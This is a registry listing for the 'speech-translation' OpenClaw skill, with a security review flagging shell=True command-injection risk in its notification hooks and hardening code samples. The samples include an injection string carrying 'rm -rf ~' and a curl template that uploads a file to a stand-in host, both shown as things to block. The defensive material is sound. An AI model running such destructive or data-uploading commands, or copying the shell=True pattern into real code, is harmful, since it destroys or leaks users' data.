
speech-translation

Name: speech-translation
Author: decin

by decin · v1.0.0 · MIT-0

cross-platform ⚠ suspicious

Downloads: 197


Install in OpenClaw

/install speech-translation

Description

Build, adapt, or run an audio-processing workflow that takes spoken audio, transcribes it with Whisper or faster-whisper, translates the transcript using the...

Usage Guidance

This skill appears to do exactly what it says: local transcription, translation orchestration, and TTS. Before installing or running it:

1) Only configure notification command templates (or the environment variables that set them) from trusted sources. The notifier code executes those commands with shell=True and may run arbitrary processes.
2) Prefer the provided mock senders for testing to avoid accidental data leaks.
3) Run the pipeline in a sandbox or isolated environment if you plan to use service backends or custom command hooks.
4) Validate any translation_service_url you provide and avoid pointing it to untrusted endpoints.
5) Install the external piper binary and the Python dependencies from trusted channels only.

When reviewing or hardening the code, start with the calls to subprocess.run that combine shell=True with unescaped string formatting.
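The advice on validating translation_service_url could be applied with a small pre-flight check like the one below. This is a minimal sketch, not code from the skill: the function name and the TRUSTED_HOSTS allowlist are hypothetical, and the policy (https required except for loopback) is an assumption you may want to tighten or relax.

```python
from urllib.parse import urlparse

# Hypothetical allowlist; replace with the hosts you actually trust.
TRUSTED_HOSTS = {"localhost", "127.0.0.1", "translate.internal.example"}
LOOPBACK_HOSTS = {"localhost", "127.0.0.1"}


def is_trusted_service_url(url: str) -> bool:
    """Return True only for http(s) URLs whose host is on the allowlist."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https"):
        return False
    # Plain http is tolerated only for loopback addresses.
    if parts.scheme == "http" and parts.hostname not in LOOPBACK_HOSTS:
        return False
    # urlparse().hostname ignores any "user@" prefix, so
    # "https://trusted@evil.example/" is judged by "evil.example".
    return parts.hostname in TRUSTED_HOSTS
```

Calling this before the URL reaches the pipeline keeps transcripts from being posted to an endpoint you did not intend.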

Capability Analysis

Type: OpenClaw Skill
Name: speech-translation
Version: 1.0.0

The skill bundle contains multiple instances of potential command injection vulnerabilities where external commands are executed via `subprocess.run(..., shell=True)` using templates provided by environment variables or CLI arguments (specifically in `scripts/send_audio.py`, `scripts/send_text.py`, and `scripts/voice_translate_app/notifier.py`). While these are designed as notification hooks for the translation pipeline, the lack of strict validation on the command templates poses a significant RCE risk. However, the code logic and agent instructions in `SKILL.md` appear consistent with the stated purpose of audio processing and translation, with no clear evidence of intentional malice or data exfiltration.
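One common way to harden a hook of this kind is to drop the shell entirely: split the template into tokens first, fill in the placeholders afterwards, and pass the resulting list to subprocess.run. The sketch below illustrates that idea only. It is not the skill's code, and build_argv, run_hook, the {text} placeholder, and the notify-send template are all hypothetical names chosen for illustration.

```python
import shlex
import subprocess


def build_argv(template: str, **fields: str) -> list:
    """Split the template into tokens first, then fill in placeholders.

    Because splitting happens before substitution, a field value can never
    add extra arguments or shell syntax; it stays inside a single token.
    """
    return [token.format(**fields) for token in shlex.split(template)]


def run_hook(template: str, **fields: str) -> subprocess.CompletedProcess:
    # No shell=True: the argv list goes straight to the OS, so characters
    # such as ';', '|' and '$(...)' are passed through as literal text.
    return subprocess.run(
        build_argv(template, **fields),
        check=True,
        capture_output=True,
        text=True,
    )


# A hostile transcript stays one harmless argument.
hostile = 'hello"; rm -rf ~; echo "'
argv = build_argv("notify-send --title Translation {text}", text=hostile)
# argv == ["notify-send", "--title", "Translation", hostile]
```

A value that starts with "-" can still be read as an option by the target program, so templates that accept untrusted text may also want a "--" separator before the placeholder where the program supports it.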

Capability Assessment

✓ Purpose & Capability

The name/description match the included Python pipeline: transcription (faster-whisper or mock), translation (agent-LLM, manual, or HTTP service), and TTS (piper or mock). There are no unrelated required credentials, binaries, or config paths; the code and docs consistently implement the described workflows.
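The three-stage flow described here (transcription, then translation, then TTS, each with a swappable backend) can be pictured with the sketch below. It is only an illustration under assumptions: every name in it is hypothetical, and the mock backends stand in for faster-whisper, the agent model, and piper rather than calling them.

```python
from dataclasses import dataclass
from typing import Callable


@dataclass
class PipelineResult:
    transcript: str
    translation: str
    audio: bytes


def run_pipeline(
    audio_in: bytes,
    transcribe: Callable[[bytes], str],
    translate: Callable[[str], str],
    synthesize: Callable[[str], bytes],
) -> PipelineResult:
    """Run the stages in a fixed order: transcript, translation, audio."""
    transcript = transcribe(audio_in)
    translation = translate(transcript)
    audio = synthesize(translation)
    return PipelineResult(transcript, translation, audio)


# Hypothetical mock backends, useful for dry runs without models or binaries.
def mock_transcribe(audio: bytes) -> str:
    return f"[mock transcript of {len(audio)} bytes]"


def mock_translate(text: str) -> str:
    return f"[mock translation] {text}"


def mock_synthesize(text: str) -> bytes:
    return text.encode("utf-8")


result = run_pipeline(b"\x00" * 16, mock_transcribe, mock_translate, mock_synthesize)
```

Passing the backends in as callables keeps the orchestration identical whether a stage is mocked or real, which is what makes a mock-only test run representative.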

ℹ Instruction Scope

SKILL.md stays on-purpose (chat-native vs local pipeline, LLM-assisted default). It explicitly supports notification hooks that run external commands to report stages; those hooks (and send_text/send_audio helpers) cause the runtime to execute arbitrary shell commands when configured. This is expected for a pipeline but expands the skill's runtime actions beyond pure file IO/network calls — treat notification command templates as sensitive configuration.

✓ Install Mechanism

No install spec (instruction-only + bundled scripts). That lowers risk because nothing is downloaded or installed by the registry; the repo only contains local Python scripts and shell wrappers. The runtime does require optional third-party packages (faster-whisper, requests) and an external 'piper' binary for full functionality, per the README.

ℹ Credentials

The skill declares no required env vars or credentials, which matches the code. However, several scripts read optional environment variables (VOICE_TRANSLATE_TEXT_COMMAND_TEMPLATE, VOICE_TRANSLATE_AUDIO_COMMAND_TEMPLATE) as command templates. These are not required, but if set they control which external commands are run and could be used to exfiltrate data if misconfigured or supplied by an attacker.
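Before launching the pipeline, it may help to audit whatever these two variables currently contain. The following is a heuristic sketch, not part of the skill: only the two variable names come from the assessment above, while the allowlist, the audit_templates function, and the {text} and {path} placeholders in the usage example are assumptions.

```python
import os
import shlex

TEMPLATE_VARS = (
    "VOICE_TRANSLATE_TEXT_COMMAND_TEMPLATE",
    "VOICE_TRANSLATE_AUDIO_COMMAND_TEMPLATE",
)
# Hypothetical allowlist of programs a hook may start.
ALLOWED_PROGRAMS = {"notify-send", "logger"}
# Characters that let a shell chain, substitute, or redirect commands.
SHELL_METACHARACTERS = set(";|&$`<>\n")


def audit_templates(environ=None) -> dict:
    """Map each template variable that is set to 'ok' or a rejection reason."""
    environ = os.environ if environ is None else environ
    report = {}
    for name in TEMPLATE_VARS:
        template = environ.get(name)
        if template is None:
            continue  # unset variables are not a concern
        if SHELL_METACHARACTERS & set(template):
            report[name] = "rejected: shell metacharacter"
            continue
        try:
            tokens = shlex.split(template)
        except ValueError:
            report[name] = "rejected: unbalanced quotes"
            continue
        if not tokens:
            report[name] = "rejected: empty template"
            continue
        program = os.path.basename(tokens[0])
        if program in ALLOWED_PROGRAMS:
            report[name] = "ok"
        else:
            report[name] = f"rejected: {program} is not allowlisted"
    return report


report = audit_templates({
    "VOICE_TRANSLATE_TEXT_COMMAND_TEMPLATE": "notify-send {text}",
    "VOICE_TRANSLATE_AUDIO_COMMAND_TEMPLATE": "curl -F file=@{path} https://example.invalid/upload",
})
```

In this example the text template passes and the audio template is rejected because curl is not on the allowlist. A check like this only flags obviously risky configuration; it does not make a shell=True call safe on its own.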

✓ Persistence & Privilege

The skill does not request persistent/always-on inclusion, does not modify other skills or system settings, and does not demand elevated privileges. It runs as a normal on-demand pipeline invoked by the agent/user.

How to Use

1) Make sure OpenClaw is installed (local or Docker).
2) Run the install command in chat: /install speech-translation
3) After installation, invoke the skill by name or use /speech-translation
4) Provide the required inputs per the skill's parameter spec and get structured output.

Version History

v1.0.0

- Initial release of the voice translation skill.
- Supports audio transcription with Whisper or faster-whisper, translation by the current agent model, and speech synthesis using Piper, OpenClaw tts, or a mock backend.
- Offers two modes: chat-native voice translation and a deterministic local file-based pipeline.
- Ensures consistent output order: transcript, translation, then translated audio.
- Includes resources, references, and scripts for setup, orchestration, and backend selection.
- Designed for both interactive chat and automated batch workflows.

Metadata

Slug speech-translation

Version 1.0.0

License MIT-0

All-time Installs 1

Active Installs 1

Total Versions 1

Frequently Asked Questions

What is speech-translation?

Build, adapt, or run an audio-processing workflow that takes spoken audio, transcribes it with Whisper or faster-whisper, translates the transcript using the... It is an AI Agent Skill for Claude Code / OpenClaw, with 197 downloads so far.

How do I install speech-translation?

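Run "/install speech-translation" in the OpenClaw or Claude Code chat to install it in one step. Full functionality additionally requires the optional third-party packages (faster-whisper, requests) and an external piper binary, per the README.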

Is speech-translation free?

Yes, speech-translation is completely free, licensed under MIT-0. You can download, install and use it at no cost.

Which platforms does speech-translation support?

speech-translation is cross-platform and runs anywhere OpenClaw / Claude Code is available.

Who created speech-translation?

It is built and maintained by decin (@decin); the current version is v1.0.0.
